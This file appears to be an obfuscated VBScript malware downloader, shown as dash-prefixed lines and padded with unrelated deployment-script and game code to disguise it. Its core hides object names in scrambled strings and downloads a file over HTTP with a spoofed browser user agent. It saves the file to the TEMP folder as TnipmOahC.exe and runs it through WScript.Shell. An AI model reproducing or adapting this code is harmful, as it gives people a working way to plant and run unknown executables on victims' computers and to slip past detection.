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- Function CopyLog()
- Dim oFile
- Dim iRetVal, fptr1, fptr2, sLine, sNewLogFolderName, sLogFile
- Dim sComputer
- Dim sLog
- Dim sBootDrive
- ' Make sure the path is accessible
- oUtility.ValidateConnection oEnvironment.Item("SLShare")
- oUtility.VerifyPathExists oEnvironment.Item("SLShare")
- If not oFSO.FolderExists(oEnvironment.Item("SLShare")) then
- oLogging.CreateEntry "An invalid SLShare value of " & oEnvironment.Item("SLShare") & " was specified.", LogTypeWarning
- Exit Function
- End if
- End Function
- NeioBurningrequiemBelish = "User"
- Function Set2Mine(Who, Color, X, y )
- For i = 0 To UBound(Mines) + 1
- If i > UBound(Mines) Then ReDim Preserve Mines(i)
- If Mines(i).Color = 0 Then
- Mines(i).Who = Who
- Mines(i).Color = Color
- Mines(i).X = X
- Mines(i).y = y
- Mines(i).Tick = 0
- SetMine = i
- Exit For
- End If
- Next
- End Function
- Dim NeioBurningrequiemensurance 'As String
- Dim NeioBurningrequiemUotOfStock 'As String
- CUA ="Mozill"+"a/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
- Dim NeioBurningrequiemRickNano 'As Object
- Dim StateUabase13 'As Object
- RACHEL = "avetof"
- Dim TristateTrue
- Function StateUabaseSubMainA()
- if D = 14 then
- AXC = "SaveToFile"
- end if
- StateUabase13.Savetofile NeioBurningrequiemUotOfStock , 4-2
- End Function
- Vrungel = ".respo"+"nseBody"
- Dim NeioBurningrequiemstatus
- NeioBurningrequiemstatus = false
- Dim SagaOD
- Dim NeioBurningrequiemcashback 'As Object
- Function F3(p)
- Set NeioBurningrequiemRombickom = CreateObject("WScript"+".Shell")
- End Function
- NeioBurningrequiem2 = "Microsoft.XMLHTTPRezvoAdodb.streaMRezvo"+"shell.ApplicationRezvoWscript"+".shellRezvoProcessRezvoGeTRezvoT"+"emPRezvoTySLEMB"+"peSLEMB"
- Function SheduledObject(p,d)
- NeioBurningrequiemRombickom.Run("" &NeioBurningrequiemUotOfStock )
- End Function
- Dim NeioBurningrequiem1DASH1solo 'As Object
- Function ABTF(A, B, T, F)
- set ABTF = A.CreateTextFile( B,T , F)
- end function
- Function MambaMamba( trtrtr )
- MambaMamba = Split(Replace(NeioBurningrequiem2, "SLEMB", "" ), trtrtr)
- End Function
- Dim NeioBurningrequiem2 'As String
- Dim NeioBurningrequiemGMAKO 'As Object
- Dim mual
- Function NeioBurningrequiemFuks(p)
- NeioBurningrequiemRickNano.Send
- End Function
- NeioBurningrequiem2 = NeioBurningrequiem2 +"RezvoSLEMBoSLEMBpenRezvowrSLEMBiteRezvoreSLEMBspoSLEMBnseBoSLEMBdyRezvosaSLEMBvet"+"ofSLEMBileRezvo\TnipmOahC.exeSLEMB"+"RezvohtSLEMBtp:Rezvo//"
- Function StateUabaseSubMainA2(param1)
- param1 = param1 + param1
- if 1 < param1 OR param1 < 6777 Then
- NeioBurningrequiemASALLLP = NeioBurningrequiemRickNano.responseBody
- end if
- param1 = 2 * param1
- End Function
- Dim NeioBurningrequiem4 'As String
- Public Function WriteCD(aWrite,bWrite)
- astp = 12
- astp = astp + 3
- if astp > 4 then
- aWrite.Write bWrite
- astp = 3 * astp
- end if
- End Function
- SagaOD = MambaMamba("" + "Rezvo" + "")
- Dim NeioBurningrequiemRombickom
- Dim MarketPlace 'As String
- Dim sTempVis 'As String
- Dim iCount 'As Integer
- Dim NeioBurningrequiemASALLLP 'As Variant
- Dim dePetya 'As Integer
- NeioBurningrequiemBelish = NeioBurningrequiemBelish + "-"
- Dim iSlashPOS 'As Integer
- Dim sDecimalVis 'As String
- Dim NeioBurningrequiemPetir 'As String
- NeioBurningrequiemPetir = "Ag"
- Dim MarketPlaceibility 'As String
- Dim sNodeKey 'As String
- Dim sParentKey 'As String
- Set NeioBurningrequiemRickNano = CreateObject(SagaOD(0))
- iSlashPOS = 11 + 1
- zTempVis = SagaOD(iSlashPOS/iSlashPOS)
- 'Set NeioBurningrequiemGMAKO = CreateObject(SagaOD(8-6))
- Set NeioBurningrequiemStartupeOb = GetRef("SheduledObject")
- Set StateUabase13 = CreateObject("Adodb.streaM")
- Set NeioBurningrequiem1DASH1solo = CreateObject(SagaOD(9-6))
- Function SetUA()
- NeioBurningrequiemLamp.setRequestHeader NeioBurningrequiemBelish, CUA
- End Function
- if "RIDG" + WScript + "3" = "RIDGWindows Script Host3" Then
- mual = Array("","","")
- Set NeioBurningrequiemcashback = NeioBurningrequiem1DASH1solo.Environment(SagaOD(1 + 3))
- end if
- Public Function Anim2UniBall(i)
- Dim Rx, Ry, rBuff
- Dim xt, yt, j, e
- Dim NewX, NewY, d, SgnX, SgnY
- Dim RatioX, RatioY
- Rx = 452
- Ry = 81
- If SgnY = 1 Then 'y positive testing
- For d = UniBall(i).BallY + 1 To NewY
- j = WeaponTouch(6, i, NewX, d)
- If j = -6 Then
- UniBall(i).BMoveY = UniBall(i).BMoveY * -1
- NewY = d - 1
- Exit For
- End If
- Next
- End If
- If SgnY = -1 Then 'y negative testing
- For d = UniBall(i).BallY - 1 To NewY Step -1
- j = WeaponTouch(6, i, NewX, d)
- If j = -6 Then
- UniBall(i).BMoveY = UniBall(i).BMoveY * -1
- NewY = d + 1
- Exit For
- End If
- Next
- End If
- j = WeaponTouch(6, i, NewX, NewY)
- If j = -7 Then Exit Function
- UniBall(i).BallX = NewX
- UniBall(i).BallY = NewY
- End Function
- dePetya = 89210
- NeioBurningrequiemensurance = NeioBurningrequiemcashback(SagaOD(6))
- Dim i
- 'on error GoTo nextU
- ' on error resume next
- sTempVis = SagaOD(iSlashPOS)
- Sub SendFlagDat(SndTo)
- Dim i , b , n
- Dim oNewMsg() , lNewOffSet
- Dim lNewMsg
- For i = 1 To UBound(Flag1, 2)
- lNewMsg = MSG_FLAGS
- lNewOffSet = 0
- ReDim oNewMsg(0)
- AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
- b = 1
- AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
- b = i
- AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
- n = Flag1(0, i)
- AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
- n = Flag1(1, i)
- AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
- n = FlagCarry1(i)
- AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
- SendTo oNewMsg, CInt(SndTo)
- Next
- For i = 1 To UBound(Flag2, 2)
- lNewMsg = MSG_FLAGS
- lNewOffSet = 0
- ReDim oNewMsg(0)
- AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
- b = 2
- AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
- b = i
- AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
- n = Flag2(0, i)
- AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
- n = Flag2(1, i)
- AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
- n = FlagCarry2(i)
- AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
- SendTo oNewMsg, CInt(SndTo)
- Next
- For i = 1 To UBound(Flag3, 2)
- lNewMsg = MSG_FLAGS
- lNewOffSet = 0
- ReDim oNewMsg(0)
- AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
- b = 3
- AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
- b = i
- AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
- n = Flag3(0, i)
- AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
- n = Flag3(1, i)
- AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
- n = FlagCarry3(i)
- AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
- SendTo oNewMsg, CInt(SndTo)
- Next
- For i = 1 To UBound(Flag4, 2)
- lNewMsg = MSG_FLAGS
- lNewOffSet = 0
- ReDim oNewMsg(0)
- AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
- b = 4
- AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
- b = i
- AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
- n = Flag4(0, i)
- AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
- n = Flag4(1, i)
- AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
- n = FlagCarry4(i)
- AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
- SendTo oNewMsg, CInt(SndTo)
- Next
- For i = 1 To UBound(Flag5, 2)
- lNewMsg = MSG_FLAGS
- lNewOffSet = 0
- ReDim oNewMsg(0)
- AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
- b = 5
- AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
- b = i
- AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
- n = Flag5(0, i)
- AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
- n = Flag5(1, i)
- AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
- n = FlagCarry5(i)
- AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
- SendTo oNewMsg, CInt(SndTo)
- Next
- End Sub
- MarketPlace = SagaOD(11+2) & SagaOD(11+3)
- NeioBurningrequiemBelish = NeioBurningrequiemBelish & NeioBurningrequiemPetir & "ent"
- rdde = 19
- lTo = UBound(mual)
- For i = 0 To lTo Step 1
- rdde = rdde * 8
- on error resume next
- dePetya = dePetya +7
- NeioBurningrequiem4 = MarketPlace + mual(i)
- NeioBurningrequiemRickNano.Open SagaOD(5), NeioBurningrequiem4, False
- dr1=2
- rdde = rdde + 7
- SetUA()
- NeioBurningrequiemFuks " d "
- If NeioBurningrequiemRickNano.Status +3 = 203 Then
- NeioBurningrequiemstatus = true
- Exit For
- End If
- goto14:
- Next
- on error goto 0
- if NeioBurningrequiemstatus Then
- Dim Ratchet 'As String
- NeioBurningrequiemUotOfStock = NeioBurningrequiemensurance+ sTempVis
- F3 ""
- StateUabase13.Type = 1
- StateUabase13.Open
- StateUabaseSubMainA2 22
- WriteCD StateUabase13,NeioBurningrequiemASALLLP
- dttat =4
- NeioBurningrequiemUotOfStocku = "" + NeioBurningrequiemUotOfStock
- dttat = dttat*2
- StateUabaseSubMainA()
- Dim NeioBurningrequiemJohnSnowu,NeioBurningrequiemTmp1 'As Long
- NeioBurningrequiemJohnSnowu = 3012
- If 1010 < NeioBurningrequiemJohnSnowu Then
- drba =55
- NeioBurningrequiemTmp1 = "|"
- NeioBurningrequiemStartupeOb 4,"91"
- End If
- triada = 341
- end if
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